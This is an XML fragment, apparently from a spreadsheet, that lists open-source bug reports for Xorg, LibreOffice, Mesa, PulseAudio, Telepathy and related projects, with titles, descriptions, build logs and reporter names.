  intel drivers 2.21.15
Let me know if you need any other information and I'll attempt to provide it.</t>
  </si>
  <si>
    <t>XORG-31018</t>
  </si>
  <si>
    <t>1.10 Release Tracking Bug</t>
  </si>
  <si>
    <t>This bug holds references to bugs which should be tracked during the 1.10
development process.</t>
  </si>
  <si>
    <t>SYSTEMD-70734</t>
  </si>
  <si>
    <t>Rudder pedal's eventX doesn't receive ACL.</t>
  </si>
  <si>
    <t>Hello
when a rudder pedals (e.g. 06a3:0763 Saitek PLC Pro Flight Rudder Pedals) are connected the /dev/input/jsX and /dev/input/eventX are created. The problem is that while jsX device has 644 permissions (enybody can read) the eventX device is available only to root while any other joystick-like device receives ACLs for the current user.
If I'm not mistaken the culprit is in the joystick detection heuristics - it looks for some axes and buttons while these devices have only three axes.
Would it be possible to either extend the joystick detection heuristics to handle such devices (CH products pedals reportedly behave the same) or to create some exceptions for them so these devices would work out of the box?
Please let me know if you need any more informations.
Kind regards
Michal Navratil</t>
  </si>
  <si>
    <t>f.josef</t>
  </si>
  <si>
    <t>HARFBUZZ-63107</t>
  </si>
  <si>
    <t>FTBFS on ppc64: symbols marked with 'D' on powerpc64 instead</t>
  </si>
  <si>
    <t>In output of nm utility symbols are marked with 'D' on powerpc64-linux instead of 'T'
because powerpc64-linux uses 64-bit PowerPC ELF ABI
in which function descriptors are found in data section.
http://refspecs.linuxfoundation.org/ELF/ppc64/PPC-elf64abi.html
Patch is attached.</t>
  </si>
  <si>
    <t>GYPSY-48564</t>
  </si>
  <si>
    <t>Does not jhbuild</t>
  </si>
  <si>
    <t>In running jhbuild for the Gnome 3.4 moduleset I got this with a fresh setup (Gypsy has never been built before):
git clone git://anongit.freedesktop.org/gypsy
Cloning into gypsy...
remote: Counting objects: 469 done.
remote: Compressing objects: 100% (279/279) done.
remote: Total 469 (delta 301) reused 298 (delta 187)
Receiving objects: 100% (469/469) 187.32 KiB done.
Resolving deltas: 100% (301/301) done.
git remote set-url origin git://anongit.freedesktop.org/gypsy
git remote update origin
Fetching origin
git pull --rebase
Current branch master is up to date.
*** Configuring gypsy *** [16/45]
./autogen.sh --prefix /home/federico/jhbuild/install --libdir '/home/federico/jhbuild/install/lib'  --disable-static 
autoreconf: Entering directory `.'
autoreconf: configure.ac: not using Gettext
autoreconf: running: aclocal 
configure.ac:11: warning: macro `AM_PROG_LIBTOOL' not found in library
configure.ac:59: warning: PKG_PROG_PKG_CONFIG is m4_require'd but not m4_defun'd
/home/federico/jhbuild/install/share/aclocal/gtk-doc.m4:7: GTK_DOC_CHECK is expanded from...
configure.ac:59: the top level
autoreconf: configure.ac: tracing
configure.ac:59: warning: PKG_PROG_PKG_CONFIG is m4_require'd but not m4_defun'd
aclocal.m4:29: GTK_DOC_CHECK is expanded from...
configure.ac:59: the top level
autoreconf: configure.ac: not using Libtool
autoreconf: running: /usr/bin/autoconf
configure.ac:59: warning: PKG_PROG_PKG_CONFIG is m4_require'd but not m4_defun'd
aclocal.m4:29: GTK_DOC_CHECK is expanded from...
configure.ac:59: the top level
configure.ac:11: error: possibly undefined macro: AM_PROG_LIBTOOL
      If this token and others are legitimate please use m4_pattern_allow.
      See the Autoconf documentation.
configure.ac:18: error: possibly undefined macro: AC_DEFINE
configure.ac:26: error: possibly undefined macro: AC_SUBST
configure.ac:31: error: possibly undefined macro: AC_MSG_ERROR
autoreconf: /usr/bin/autoconf failed with exit status: 1</t>
  </si>
  <si>
    <t>iain</t>
  </si>
  <si>
    <t>XORG-96695</t>
  </si>
  <si>
    <t>[HSW/BDW Bisected] 3D graphics show previous buffers</t>
  </si>
  <si>
    <t>Buffer swapping was broken in commit cac7c8dc4b154d37ff27430aa7b714ac84f3d092.
When rendering 3D graphics old buffer contents show up between all rendered frames. This happens in both fullscreen and windowed mode.
The problem is visible on Haswell and Broadwell but not on Skylake with both DRI2 and DRI3. It can be easily seen when running a GPU intensive program like FurMark.</t>
  </si>
  <si>
    <t>pekka.jylha-ollila</t>
  </si>
  <si>
    <t>LIBREOFFICE-69208</t>
  </si>
  <si>
    <t>Other: transex3.exe causes an exception when using Parallel Build.</t>
  </si>
  <si>
    <t>Created attachment 85607
stacktrace
Problem description: 
Sometimes transex3.exe causes an exception in l10ntools module when using Parallel Build.
I'm using Visual Studio 2012 and Windows 8.
I attach a stacktrace.
Steps to reproduce:
1. ./autogen.sh with --with-parallelism=12 switch.
2. /opt/lo/bin/make 
Build will fail with the following message.
-------------------------------------------------
/opt/lo/bin/make -j 12 -rs -f F:/lo4mas/core/Makefile.gbuild
[build DEP] LNK:Executable/reg2unoidl.exe
[build DEP] LNK:Library/iunoidl.lib
[build DEP] LNK:Executable/uno-skeletonmaker.exe
[build DEP] LNK:Library/ishlxthdl_x64.lib
[build DEP] LNK:Library/ishlxthdl.lib
[build DEP] LNK:Executable/regcompare.exe
[build DEP] LNK:Executable/regview.exe
[build DEP] LNK:Executable/regmerge.exe
[build DEP] LNK:Executable/idlc.exe
[build DEP] LNK:Library/idict_zh.lib
[build DEP] LNK:Library/idict_ja.lib
[build DEP] LNK:Executable/cppumaker.exe
[build DEP] LNK:Executable/javamaker.exe
[build DEP] LNK:Library/iunoidl.lib
[build LNK] Library/iunoidl.lib
[build DEP] LNK:Executable/idlc.exe
[build LNK] Executable/idlc.exe
[build DEP] LNK:Executable/regmerge.exe
   ãƒ©ã‚¤ãƒ–ãƒ©ãƒª F:/lo4mas/core/workdir/wntmsci14/LinkTarget/Library/iunoidl.lib ã¨ã‚ªãƒ–ã‚¸ã‚§ã‚¯ãƒˆ F:/lo4mas/core/workdir/wntmsci14/LinkTarget/Library/iunoidl.exp ã‚’ä½œæˆä¸­
[build LNK] Executable/regmerge.exe
   ãƒ©ã‚¤ãƒ–ãƒ©ãƒª F:/lo4mas/core/workdir/wntmsci14/LinkTarget/Executable/idlc.lib ã¨ã‚ªãƒ–ã‚¸ã‚§ã‚¯ãƒˆ F:/lo4mas/core/workdir/wntmsci14/LinkTarget/Executable/idlc.exp ã‚’ä½œæˆä¸­
[build DEP] LNK:Executable/regcompare.exe
[build LNK] Executable/regcompare.exe
[build PRJ] xslt
[build PKG] xslt
[build SRS] accessibility/source/helper/accessiblestrings.src
[build SRS] vcl/source/src/btntext.src
[build SRS] vcl/source/src/helptext.src
[build SRS] vcl/source/src/menu.src
[build SRS] vcl/source/src/print.src
[build SRS] vcl/source/src/stdtext.src
[build SRS] vcl/source/src/throbber.src
[build SRS] vcl/source/src/units.src
[build SRS] vcl/source/src/fpicker.src
[build SRS] vcl/source/edit/textundo.src
[build SRS] svtools/source/contnr/fileview.src
[build SRS] svtools/source/contnr/svcontnr.src
make[1]: *** [F:/lo4mas/core/workdir/wntmsci14/SrsPartMergeTarget/vcl/source/src/units.src] Error 255
make[1]: *** Deleting file `F:/lo4mas/core/workdir/wntmsci14/SrsPartMergeTarget/vcl/source/src/units.src'
make[1]: *** Waiting for unfinished jobs....
make[1]: *** [F:/lo4mas/core/workdir/wntmsci14/SrsPartMergeTarget/svtools/source/contnr/fileview.src] Error 255
make[1]: *** Deleting file `F:/lo4mas/core/workdir/wntmsci14/SrsPartMergeTarget/svtools/source/contnr/fileview.src'
make[1]: *** [F:/lo4mas/core/workdir/wntmsci14/SrsPartMergeTarget/vcl/source/edit/textundo.src] Error 255
make[1]: *** Deleting file `F:/lo4mas/core/workdir/wntmsci14/SrsPartMergeTarget/vcl/source/edit/textundo.src'
make[1]: *** [F:/lo4mas/core/workdir/wntmsci14/SrsPartMergeTarget/vcl/source/src/fpicker.src] Error 255
make[1]: *** Deleting file `F:/lo4mas/core/workdir/wntmsci14/SrsPartMergeTarget/vcl/source/src/fpicker.src'
make[1]: *** [F:/lo4mas/core/workdir/wntmsci14/SrsPartMergeTarget/vcl/source/src/stdtext.src] Error 255
make[1]: *** Deleting file `F:/lo4mas/core/workdir/wntmsci14/SrsPartMergeTarget/vcl/source/src/stdtext.src'
make[1]: *** [F:/lo4mas/core/workdir/wntmsci14/SrsPartMergeTarget/vcl/source/src/print.src] Error 255
make[1]: *** Deleting file `F:/lo4mas/core/workdir/wntmsci14/SrsPartMergeTarget/vcl/source/src/print.src'
make[1]: *** [F:/lo4mas/core/workdir/wntmsci14/SrsPartMergeTarget/vcl/source/src/menu.src] Error 255
make[1]: *** Deleting file `F:/lo4mas/core/workdir/wntmsci14/SrsPartMergeTarget/vcl/source/src/menu.src'
make[1]: *** [F:/lo4mas/core/workdir/wntmsci14/SrsPartMergeTarget/vcl/source/src/helptext.src] Error 255
make[1]: *** Deleting file `F:/lo4mas/core/workdir/wntmsci14/SrsPartMergeTarget/vcl/source/src/helptext.src'
make[1]: *** [F:/lo4mas/core/workdir/wntmsci14/SrsPartMergeTarget/vcl/source/src/btntext.src] Error 255
make[1]: *** Deleting file `F:/lo4mas/core/workdir/wntmsci14/SrsPartMergeTarget/vcl/source/src/btntext.src'
make[1]: *** [F:/lo4mas/core/workdir/wntmsci14/SrsPartMergeTarget/accessibility/source/helper/accessiblestrings.src] Error 255
make[1]: *** Deleting file `F:/lo4mas/core/workdir/wntmsci14/SrsPartMergeTarget/accessibility/source/helper/accessiblestrings.src'
make: *** [build] Error 2
-------------------------------------------------
Operating System: Windows (other)
Version: 4.2.0.0.alpha0+ Master</t>
  </si>
  <si>
    <t>yagit</t>
  </si>
  <si>
    <t>PIXMAN-12039</t>
  </si>
  <si>
    <t>Double free of region data on pixman_region_validate() error path</t>
  </si>
  <si>
    <t>During pixman_region_validate() the incoming region is copied onto a local array. However during the cleanup after error both the local array and incoming region are destroyed - causing a double free of the incoming rectangle data.</t>
  </si>
  <si>
    <t>LIBREOFFICE-47311</t>
  </si>
  <si>
    <t>EDITING: Crash copy one or more cells in more than one sheet</t>
  </si>
  <si>
    <t>In a new spreadsheet.
Introduce in Sheet1:
A1:    1
Select A1 copy (Ctrl-C)
Select Sheet2
Paste
Ok!
Select Sheet1 and Sheet2 (Shift+click)
Paste
Crash!
Select Sheet2 and Sheet3 (Shift+click)
Paste
Crash!</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-16265</t>
  </si>
  <si>
    <t>Hook permissions on new git repos</t>
  </si>
  <si>
    <t>The post-update hook needs to be chmod +x to ensure that the repo can be
cloned or fetched over http for those who use that access method.
(Read the git-update-server-info(1) man page for details.)
On annarchy this:
: find /git/ -name post-update \! -perm -111 -ls
finds 42 repos which need that fix.  
After the hooks are fixed git-update-server-info should be run in each
of the affected repos.
This will of course have to be done on kemper.
The procedure for adding a repo should set the +x perm when the repo is
created or copied over.
(A quick test on my box shows that doing the chmod on the hooks in the templates dir does indeed propagate to repos subsequently git-init(1)ed.  I suspect any such change will have to be redone after any apt-get upgrade which upgrades git....)
I don't know how often http is used for fdo repos.  As an example there
are only 31 repos accessible via http://people.fd.o but at least 230
available via git://people.fd.o.  And about a third of those 31 won't
work over http because they need a git-update-server-info.
But there has been some chatter about failing http clones on the lists
so it seems at least some people use it at least some of the time.
(CC (of initial email) via bugz by request.)</t>
  </si>
  <si>
    <t>XORG-10670</t>
  </si>
  <si>
    <t>inter driver turns off VGA output after a Xorg server reset</t>
  </si>
  <si>
    <t>I'm testing on HP 7600U (945) and HP 7700U (965)
running FC4 with 2.6.20 kernel and Xorg 7.2 + 
tar balls depends to support git intel driver
built from source.
1. start Xorg
2. xmessage Hello
3. ^C xmessage
4. xmessage Hello
At 1 the screen goes black showing Xorg is running and the screen is happy.
At 2 Hello appears on the screen
At 3 the Xorg server resets and the screen is still happy.
At 4 the screen sees the VGA signal go away.
Since xmessage is the one and only client when it quits the Xorg server will reset itself. The interesting message in the logs is:
(WW) intel(0):   Hardware claims plane A is off while software believes it is on</t>
  </si>
  <si>
    <t>LIBREOFFICE-47871</t>
  </si>
  <si>
    <t>: Chapter Names with Footnotes Inserted as a Field</t>
  </si>
  <si>
    <t>Created attachment 59041
An image of the issue and the insert fields dialog showing that it occurs elsewhere as well.
Problem description:
If a heading has a footnote and is added elsewhere by means of a chapter name field (in the header for example) the footnote reference number (which is superscript) shows up in the chapter name generated by the field (as regular text).
Steps to reproduce:
1. Make a new document 
2. Add some text and make it heading level 1
3. Add a footnote to the heading: Insert -&gt; Footnote/Endnote... -&gt; OK
4. Add a chapter name field: Insert -&gt; Fields -&gt; Other... -&gt; Document -&gt; Chapter -&gt; Chapter Name -&gt; Insert
Current behavior:
If a heading is called Truth in Advertising and has footnote 1 at the end it will show up as Truth in Advertising1
Expected behavior:
If a heading is called Truth in Advertising and has footnote 1 at the end it should show up as Truth in Advertising
Browser: Mozilla/5.0 (X11 Linux i686 rv:11.0) Gecko/20100101 Firefox/11.0</t>
  </si>
  <si>
    <t>bdjnks</t>
  </si>
  <si>
    <t>PULSEAUDIO-93946</t>
  </si>
  <si>
    <t>Changing device profile to HDMI is reset to default after monitor goes into powersave</t>
  </si>
  <si>
    <t>I have an arch linux system with an up to date plasma desktop (plasma-framework 5.18.0-3 (kf5) and plasma-desktop 5.5.4-1 (plasma) and running pulseaudio for sound.
After recent package updates to:
[2016-01-23 10:56] [ALPM] upgraded libpulse (7.1-3 -&gt; 8.0-1)
[2016-01-23 10:56] [ALPM] upgraded pulseaudio (7.1-3 -&gt; 8.0-1)
[2016-01-23 10:56] [ALPM] upgraded pulseaudio-gconf (7.1-3 -&gt; 8.0-1)
I found that my usual sound setting to have sound output going to the HDMI output to my monitor speakers had been changed to analogue.  
From the plasma K menu I have to go to System Settings -&gt; Multimedia then Audio and Video tab - choose Audio Hardware Setup tab - and then select the sound card profile as Digital Stereo (HDMI 2) Output and Analog Stereo Input and click Apply.  If I then run pactl list sinks in a terminal I get output which has the tail end as:
device.product.name = 7 Series/C210 Series Chipset Family High Definition Audio Controller
                device.form_factor = internal
                device.string = hdmi:01
                device.buffering.buffer_size = 352800
                device.buffering.fragment_size = 176400
                device.access_mode = mmap+timer
                device.profile.name = hdmi-stereo-extra1
                device.profile.description = Digital Stereo (HDMI 2)
                device.description = Built-in Audio Digital Stereo (HDMI 2)
                alsa.mixer_name = Intel PantherPoint HDMI
                alsa.components = HDA:10ec08928086203600100302 HDA:808628068086010100100000
                module-udev-detect.discovered = 1
                device.icon_name = audio-card-pci
        Ports:
                hdmi-output-1: HDMI / DisplayPort 2 (priority: 5800 available)
        Active Port: hdmi-output-1
        Formats:
                pcm
Then sound through the HDMI connection to the speakers on the monitor works fine but only for some limited period. 
After some period of time leaving the system not using any sound output the sound stops working again and the command pactl list sinks in a terminal then shows:
device.product.name = 7 Series/C210 Series Chipset Family High Definition Audio Controller
                device.form_factor = internal
                device.string = front:0
                device.buffering.buffer_size = 352800
                device.buffering.fragment_size = 176400
                device.access_mode = mmap+timer
                device.profile.name = analog-stereo
                device.profile.description = Analog Stereo
                device.description = Built-in Audio Analog Stereo
                alsa.mixer_name = Intel PantherPoint HDMI
                alsa.components = HDA:10ec08928086203600100302 HDA:808628068086010100100000
                module-udev-detect.discovered = 1
                device.icon_name = audio-card-pci
        Ports:
                analog-output-lineout: Line Out (priority: 9900 not available)
                analog-output-speaker: Speakers (priority: 10000)
                analog-output-headphones: Headphones (priority: 9000)
        Active Port: analog-output-speaker
        Formats:
                pcm
If I then go back to the System Settings and look again at Multimedia then Audio and Video tab - choose Audio Hardware Setup tab my settings have reverted back to Analogue Stereo Output.
So it seems that pulseaudio has some kind of timeout for the changed setting and it does not remain permanent despite changing it and applying it in the plasma settings area.  I have also tried changing the setting by right clicking the volume icon in the system tray which then leads to the same GUI and options. But this has the same result.   
This may be be relevant in the journal log:
Jan 29 21:35:34 home1 systemsettings5[16487]: Error loading plugin kcm_pulseaudio The shared library was not found.
                                              Plugin search paths are (/usr/lib/qt/plugins /usr/bin)
                                              The environment variable QT_PLUGIN_PATH might be not correctly set
and later in the journal:
Jan 30 09:10:23 home1 pulseaudio[685]: E: [pulseaudio] module.c: Module module-device-manager should be loaded once at most. Refusing to load.
and later again in the journal:
Jan 30 09:11:03 home1 systemd[517]: pulseaudio.service: Service hold-off time over scheduling restart.
Jan 30 09:11:03 home1 systemd[517]: Stopped Sound Service.
Jan 30 09:11:03 home1 systemd[517]: Starting Sound Service...
Jan 30 09:11:03 home1 pulseaudio[19809]: W: [pulseaudio] pid.c: Stale PID file overwriting.
Jan 30 09:11:03 home1 systemd[517]: Started Sound Service.
Does this indicate a possible pulseaudio bug or is this a config error?  However until the recent package update this problem did not exist on my computer.</t>
  </si>
  <si>
    <t>MESA-8444</t>
  </si>
  <si>
    <t>error compiling with name mangling</t>
  </si>
  <si>
    <t>in gl_mangle.h
#define glBlitFramebufferEXT		MANGLE(BlitFramebufferEXT)
was forgotten which results into a compile error (dont have CVS access hence
reporting here)</t>
  </si>
  <si>
    <t>crazybutcher</t>
  </si>
  <si>
    <t>MESA-96343</t>
  </si>
  <si>
    <t>oom since st/mesa: implement PBO downloads for ReadPixels</t>
  </si>
  <si>
    <t>Created attachment 124282
oom
Tonga with xserver 1.8.3 agd5f drm-next-4.8-wip git mesa/llvm/libdrm/xf86-video-amdgpu.
Desktop is fluxbox = non-compositing.
Since -
commit ed0e9862c56d13381f0414b5a835fd31960edfe6
Author: Nicolai HÃ¤hnle 
Date:   Tue Apr 26 13:19:28 2016 -0500
    st/mesa: implement PBO downloads for ReadPixels
    v2: require PIPE_CAP_SAMPLER_VIEW_TARGET technically only needed for some of
        the texture targets but all hardware that has shader images should also
        have this cap.
I can provoke an oom on xorg as attached by displaying a couple of 1920 xwds with display from ImageMagick and flipping between then plus some middle mouse clicking (which magnifys a section and gives info on the pixel clicked).
Oom is not instant - may take a couple of minutes clicking/flipping.
Polling free when doing this doesn't indicate any issue until it triggers so it's not slowly leaking but goes quickly at some point filling swap then oom.</t>
  </si>
  <si>
    <t>TELEPATHY-68892</t>
  </si>
  <si>
    <t>tp_list_connection_managers_async does not invoke the callback if there are no CMs</t>
  </si>
  <si>
    <t>The GNOME OSTree images don't have any connection managers in them. They only have telepathy-glib and telepathy-mission-control. On such a setup tp_list_connection_managers_async does not invoke its callback.
One visible consequence of this is that the Add Account button in the Online Accounts panel does not present the corresponding dialog if you are using the OSTree images.</t>
  </si>
  <si>
    <t>LIBREOFFICE-51916</t>
  </si>
  <si>
    <t>FILEOPEN: Crash when opening particular RTF document with TABLES</t>
  </si>
  <si>
    <t>Created attachment 64024
Crash document
I can not open this RTF document. I tested it on:
1 - openSUSE 12.1 LibreOffice 3.5:build-392 - Crash when open
2 - Windows 7 - LibreOffice 3.5.4 - I\O error when open
3 - Windows XP - LibreOffice 3.6 Beta2 - I\O error when open</t>
  </si>
  <si>
    <t>gankov</t>
  </si>
  <si>
    <t>CAIRO-19211</t>
  </si>
  <si>
    <t>wiki login problem</t>
  </si>
  <si>
    <t>Go to http://www.cairographics.org/
Select 'Edit' you are prompted to log in
Enter Name and Password
I then receive the message
cairographics.org/ Error
  Error: login failed perhaps you need to turn on cookies?
Cookies are enabled and I can successfully view the
ikiwiki_session_cairographics.org cookie in my browser.
How are cookies related to logging in?
A second problem is :
Go to http://www.cairographics.org/
Select 'Recent Changes'
I then receive the message
Not Found
The requested URL /recentchanges/ was not found on this server.</t>
  </si>
  <si>
    <t>TELEPATHY-22236</t>
  </si>
  <si>
    <t>gabble_jingle_content_produce_node and transmit_candidates contain similar but subtly-different  stanza generators</t>
  </si>
  <si>
    <t>I noticed today that transmit_candidates() and gabble_jingle_content_produce_node() look suspiciously similar. I was tempted to replace most of the former with a call to the latter but they actually produce different XML. One includes a  node for both gtalk4 and gtalk3 while the other only adds one for gtalk4.
I'm scared to touch this without doing a bunch of interop testing so I'm going to leave it well alone.</t>
  </si>
  <si>
    <t>XORG-56591</t>
  </si>
  <si>
    <t>[SNA] Xorg crashes with SNA Kicad</t>
  </si>
  <si>
    <t>Created attachment 69325
Xorg log of crash
My X crashes every time I try to open the module editor from the Kicad suite's pcbnew layout editor.
I have narrowed the problem down to SNA. I recompiled the xf86-video-intel driver with both SNA and UXA support (I'm on Funtoo so USE flags sna and uxa enabled).
When I change the AccelMethod to SNA my X crashes immediately when I try to launch the module editor.
When I change the AccelMethod to UXA the module editor launches correctly. So I'm forced to use UXA for now if I want to use Kicad.
I have Intel Core-i5 3570K (Ivy Bridge) CPU and I'm using the integrated HD graphics. (Asus P8Z77-V LE motherboard)
kernel: 3.6.1-gentoo
xorg-server: 1.12.4 (USE flags: ipv6 nptl udev xorg -dmx -doc -kdrive -minimal -selinux -static-libs -tslib -xnest -xvfb)
libdrm: from git ebuild this morning (libkms video_cards_intel everything else disabled)
xf86-video-intel: from git ebuild today (2012-10-30) (USE: dri sna udev uxa xvmc -glamor)
(mesa: from git ebuild)
DE: Gnome 3.4.1
I'm using these commands to compile Kicad version 2011-07-08 from sources:
unzip kicad_sources-2011-07-08-BZR3044.zip
cd kicad_sources-2011-07-08_BZR3044
mkdir build
cd build
cmake -DCMAKE_BUILD_TYPE=Release -DCMAKE_INSTALL_PREFIX=/usr/local -DKICAD_KEEPCASE=ON -DKICAD_MINIZIP=OFF -DCMAKE_CXX_FLAGS=-m64 -DKICAD_STABLE_VERSION=ON ../
make
sudo make install
The same crash also happens with Kicad version 20120119_p3256 from portage tree.
(Kicad downloads can be found here: http://iut-tice.ujf-grenoble.fr/cao/ )
Xorg.0.log.old with some backtrace info:
http://pastebin.com/K1da4bn4
emerge --info output:
http://pastebin.com/T6J3GTTN</t>
  </si>
  <si>
    <t>kiesus</t>
  </si>
  <si>
    <t>TELEPATHY-22169</t>
  </si>
  <si>
    <t>Create/EnsureChannel do not allow empty Preferred_Handler</t>
  </si>
  <si>
    <t>&gt;    if (!tp_dbus_check_valid_bus_name (preferred_handler
&gt;                                       TP_DBUS_NAME_TYPE_WELL_KNOWN
&gt;                                       &amp;error))
This should only run if preferred_handler is non-empty.</t>
  </si>
  <si>
    <t>XORG-14363</t>
  </si>
  <si>
    <t>Driver/Neomagic</t>
  </si>
  <si>
    <t>xf86-video-neomagic fails to compile with git xserver</t>
  </si>
  <si>
    <t>Created attachment 14129
fix
SSIA -- uses removed PCI APIs</t>
  </si>
  <si>
    <t>TELEPATHY-30117</t>
  </si>
  <si>
    <t>Updates to my own presence are not signalled on connections supporting privacy lists</t>
  </si>
  <si>
    <t>I noticed that Empathy gets confused as to what my own status is. This turns out to be because some (but not all) of my XMPP connections fail to signal PresencesChanged() for the self-handle the affected XMPP connections are those that support privacy lists.
Having poked around I believe it's caused by not calling emit_one_presence_update() on approximately any of the code paths for connections supporting privacy lists or XEP-0186 invisibility. Eek! There are a lot of code paths these days.</t>
  </si>
  <si>
    <t>DRI-48940</t>
  </si>
  <si>
    <t>sandybridge-gt1  GPU lockup</t>
  </si>
  <si>
    <t>Forwarding this bug from Ubuntu reporter jascha:
http://bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-intel/+bug/980198
[Problem]
Yet another intermittent snb lockup.  The user is able to easily reproduce this by browsing web pages with pictures.
[Original Description]
hangs up after scrolling down a web page with some images but without flash
i did capture an error state myself see attachment. The webpage was http://forum.xda-developers.com/ and i was just scrolling down to search for my mobile.
ProblemType: Crash
DistroRelease: Ubuntu 12.04
Package: xserver-xorg-video-intel 2:2.17.0-1ubuntu4
ProcVersionSignature: Ubuntu 3.2.0-23.36-generic 3.2.14
Uname: Linux 3.2.0-23-generic x86_64
.tmp.unity.support.test.0:
ApportVersion: 2.0.1-0ubuntu2
Architecture: amd64
Chipset: sandybridge-gt1
CompizPlugins: No value set for `/apps/compiz-1/general/screen0/options/active_plugins'
CompositorRunning: compiz
Date: Thu Apr 12 21:24:49 2012
DistUpgraded: Fresh install
DistroCodename: precise
DistroVariant: ubuntu
DkmsStatus:
 virtualbox 4.1.12 3.2.0-22-generic x86_64: installed
 virtualbox 4.1.12 3.2.0-23-generic x86_64: installed
ExecutablePath: /usr/share/apport/apport-gpu-error-intel.py
ExtraDebuggingInterest: Yes whatever it takes to get this fixed in Ubuntu
GpuHangFrequency: Continuously
GpuHangReproducibility: Yes I can easily reproduce it
GpuHangStarted: Immediately after installing this version of Ubuntu
GraphicsCard:
 Intel Corporation 2nd Generation Core Processor Family Integrated Graphics Controller [8086:0102] (rev 09) (prog-if 00 [VGA controller])
   Subsystem: ASRock Incorporation Device [1849:0102]
InstallationMedia: Ubuntu 12.04 LTS Precise Pangolin - Alpha amd64 (20120201.1)
InterpreterPath: /usr/bin/python2.7
MachineType: To Be Filled By O.E.M. To Be Filled By O.E.M.
ProcCmdline: /usr/bin/python /usr/share/apport/apport-gpu-error-intel.py
ProcEnviron:
ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-3.2.0-23-generic root=UUID=f9070d7d-a7b6-47b3-bfed-f3d37adb15b1 ro quiet splash vt.handoff=7
RelatedPackageVersions:
 xserver-xorg             1:7.6+12ubuntu1
 libdrm2                  2.4.32-1ubuntu1
 xserver-xorg-video-intel 2:2.17.0-1ubuntu4
SourcePackage: xserver-xorg-video-intel
Title: [sandybridge-gt1] GPU lockup
UpgradeStatus: No upgrade log present (probably fresh install)
UserGroups:
dmi.bios.date: 07/08/2011
dmi.bios.vendor: American Megatrends Inc.
dmi.bios.version: P1.60
dmi.board.name: H67M
dmi.board.vendor: ASRock
dmi.chassis.asset.tag: To Be Filled By O.E.M.
dmi.chassis.type: 3
dmi.chassis.vendor: To Be Filled By O.E.M.
dmi.chassis.version: To Be Filled By O.E.M.
dmi.modalias: dmi:bvnAmericanMegatrendsInc.:bvrP1.60:bd07/08/2011:svnToBeFilledByO.E.M.:pnToBeFilledByO.E.M.:pvrToBeFilledByO.E.M.:rvnASRock:rnH67M:rvr:cvnToBeFilledByO.E.M.:ct3:cvrToBeFilledByO.E.M.:
dmi.product.name: To Be Filled By O.E.M.
dmi.product.version: To Be Filled By O.E.M.
dmi.sys.vendor: To Be Filled By O.E.M.
version.compiz: compiz 1:0.9.7.4-0ubuntu3
version.ia32-libs: ia32-libs 20090808ubuntu35
version.libdrm2: libdrm2 2.4.32-1ubuntu1
version.libgl1-mesa-dri: libgl1-mesa-dri 8.0.2-0ubuntu3
version.libgl1-mesa-dri-experimental: libgl1-mesa-dri-experimental N/A
version.libgl1-mesa-glx: libgl1-mesa-glx 8.0.2-0ubuntu3
version.xserver-xorg-core: xserver-xorg-core 2:1.11.4-0ubuntu10
version.xserver-xorg-input-evdev: xserver-xorg-input-evdev 1:2.7.0-0ubuntu1
version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:6.14.99~git20111219.aacbd629-0ubuntu2
version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.17.0-1ubuntu4
version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:0.0.16+git20111201+b5534a1-1build2</t>
  </si>
  <si>
    <t>XORG-26551</t>
  </si>
  <si>
    <t>No Mouse-Pointer on Second-Screen with evergreen KMS</t>
  </si>
  <si>
    <t>KMS works quite good here on my new Vapor-X 5770.
Only Multi-Head doesn't work so nice. I can't see the Mouse-Pointer on the second Screen. Apart from that I can use both screens in a normal way.
drm-radeon-testing is 7cb72ef
xf86-video-ati is 221ef11</t>
  </si>
  <si>
    <t>davidwerbung</t>
  </si>
  <si>
    <t>POPPLER-12268</t>
  </si>
  <si>
    <t>With Evince I can't copy text out from PDF documents created with cups-pdf</t>
  </si>
  <si>
    <t>The bug has been sent on http://bugzilla.gnome.org/show_bug.cgi?id=403984 and evince upstream indicated that's a poppler issue
That bug has been opened on
https://launchpad.net/ubuntu/+source/evince/+bug/49498
...
The step to reproduce are:
1) install cups-pdf
2) open gnome-cups-manager and install the new printer then make a test
pressing the
    Print a test page button
3) open in Evince the just created PDF document and try to copy the text ====&gt;
you are able to do
4) open gedit write something and choose to create a PDF with cups-pdf
5) open in Evince the PDF document just created and try to copy the text ====&gt;
you aren't able to do
...
http://librarian.launchpad.net/3026073/job_11-untitled_document.pdf
a PDF document printed with cups-pdf
This PDF document was written with gedit and printed with the cups-pdf virtual
printer.
When I open this PDF document with Evince I'm not able to select text and copy
out.
...
Just to try I have installed the Adobe Reader package.
I have opened the PDF document printed with cups-pdf in Adobe Reader and here I
can copy out the text.
Therefore the problem is in the Evince document viewer.</t>
  </si>
  <si>
    <t>POPPLER-25479</t>
  </si>
  <si>
    <t>Math symbols not displayed correctly in document</t>
  </si>
  <si>
    <t>The following document is rendered correctly in xpdf and acroread but not with poppler based pdf readers (okular and evince)
http://descanso.jpl.nasa.gov/Monograph/series2_section.cfm
See for example page  4-19 (summation greek character equal signs in summation) and 13-26 (integral)
Oystein</t>
  </si>
  <si>
    <t>oystein.olsen</t>
  </si>
  <si>
    <t>DRI-110890</t>
  </si>
  <si>
    <t>[CI][SHARDS] igt@gem_ctx_shared@exec-shared-gtt-default - fail - Failed assertion: *batch == 0xc0ffee</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/IGT_5046/shard-apl6/igt@gem_ctx_shared@exec-shared-gtt-default.html
Starting subtest: exec-shared-gtt-default
(gem_ctx_shared:2958) CRITICAL: Test assertion failure function exec_shared_gtt file ../tests/i915/gem_ctx_shared.c:241:
(gem_ctx_shared:2958) CRITICAL: Failed assertion: *batch == 0xc0ffee
(gem_ctx_shared:2958) CRITICAL: error: 0x5000000 != 0xc0ffee</t>
  </si>
  <si>
    <t>DRI-98041</t>
  </si>
  <si>
    <t>[BAT][SKL] CPU pipe X fifo underrun</t>
  </si>
  <si>
    <t>Usual errors like:
[  520.080543] [drm:intel_cpu_fifo_underrun_irq_handler [i915]] *ERROR* CPU pipe B FIFO underrun
Happening sporadically in BAT under tests like:
kms_pipe_crc_basic@hang-read-crc-pipe-a
kms_pipe_crc_basic@suspend-read-crc-pipe-a
kms_pipe_crc_basic@nonblocking-crc-pipe-b
pm_rpm@basic-rte
First found build in the CI matrix is CI_DRM_1645.</t>
  </si>
  <si>
